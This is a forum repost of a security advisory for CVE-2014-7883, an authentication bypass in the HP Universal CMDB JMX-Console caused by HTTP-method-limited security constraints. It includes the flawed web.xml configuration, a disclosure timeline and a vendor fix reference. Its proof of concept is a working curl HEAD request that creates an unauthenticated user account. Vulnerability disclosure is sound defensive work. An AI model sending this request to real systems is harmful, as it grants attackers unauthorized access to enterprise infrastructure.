Aerosol Posted February 3, 2015 Report Posted February 3, 2015 Mogwai Security Advisory MSA-2015-02----------------------------------------------------------------------Title: Hewlett-Packard UCMDB - JMX-Console AuthenticationBypassCVE-ID: CVE-2014-7883Product: Hewlett-Packard Universal CMDB (UCMDB) Affected versions: UCMDB 10.10 (Other versions might also be affected) Impact: highRemote: yesProduct link: http://www8.hp.com/us/en/software-solutions/configuration-management-system-database/index.htmlReported: 14/11/2014 by: Hans-Martin Muench (Mogwai, IT-SicherheitsberatungMuench) Vendor's Description of the Software:----------------------------------------------------------------------The HP Universal CMDB (UCMDB) automatically collects and manages accurate andcurrentbusiness service definitions, associated infrastructure relationships anddetailed informationon the assets, and is a central component in many of the key processes in yourIT organization,such as change management, asset management, service management, and businessservicemanagement. The UCMDB ensures that these processes can rely on comprehensive andtruedata for all business services. Together with HP UCMDB Configuration Manager(UCMDB-CM)you can standardize your IT environments, and make sure they comply with clearpolicies, anddefined authorization process.Many IT organizations turn to a CMDB and configuration management processes tocreate ashared single version of truth to support business service management, ITservice management,change management, and asset management initiatives. These initiatives helpalign IT effortswith business requirements and run IT operations more efficiently andeffectively.The initiatives success depends on the CMDB providing a complete view into theconfiguration items(CIs) and assets as well as how various IT elements relate together to deliverthe business service.-----------------------------------------------------------------------Business recommendation:-----------------------------------------------------------------------Apply configuration changes from HP https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsearch/document/KM01351169-- CVSS2 Ratings ------------------------------------------------------CVSS Base Score: 6.4Impact Subscore: 4.9Exploitability Subscore: 10CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:N)-----------------------------------------------------------------------Vulnerability description:----------------------------------------------------------------------UCMB administrators heavily rely on a JMX-Console, which is installed bydefault.The JMX-Console web application in UCMDB performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method (for exampleHEAD).The web.xml file of the JMX Console contains following security constrains:<security-constraint><web-resource-collection><web-resource-name>Protected Pages</web-resource-name><url-pattern>/*</url-pattern><http-method>GET</http-method><http-method>POST</http-method></web-resource-collection><auth-constraint><role-name>sysadmin</role-name></auth-constraint></security-constraint><security-constraint><web-resource-collection><web-resource-name>Callhome Servlet</web-resource-name><url-pattern>/callhome</url-pattern><http-method>GET</http-method><http-method>POST</http-method></web-resource-collection></security-constraint>This vulnerability is identical with CVE-2010-0738 (JBoss JMX-Console Authentication bypass). This can be used to create a new account which can then be used to access the JMX console.Proof of concept:----------------------------------------------------------------------The following Curl command will send a HEAD request to create a new user"pocuser" in the UCMDB Backend:curl -I"http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser"Disclosure timeline:----------------------------------------------------------------------14/11/2014: Reporting issue to HP18/11/2014: Re-Reporting, as no acknowledge received18/11/2014: Acknowledge from HP02/01/2015: Requesting status update from HP29/01/2015: Requesting status update from HP31/01/2015: Response from HP, they plan to release the advisory next week02/05/2015: HP releases security bulletin03/05/2015: Mogwai security bulletin releaseAdvisory URL:----------------------------------------------------------------------https://www.mogwaisecurity.de/#labReferences:----------------------------------------------------------------------Official HP security bulletinhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04553906----------------------------------------------------------------------Mogwai, IT-Sicherheitsberatung MuenchSteinhoevelstrasse 2/289075 Ulm (Germany)info@mogwaisecurity.de Source Quote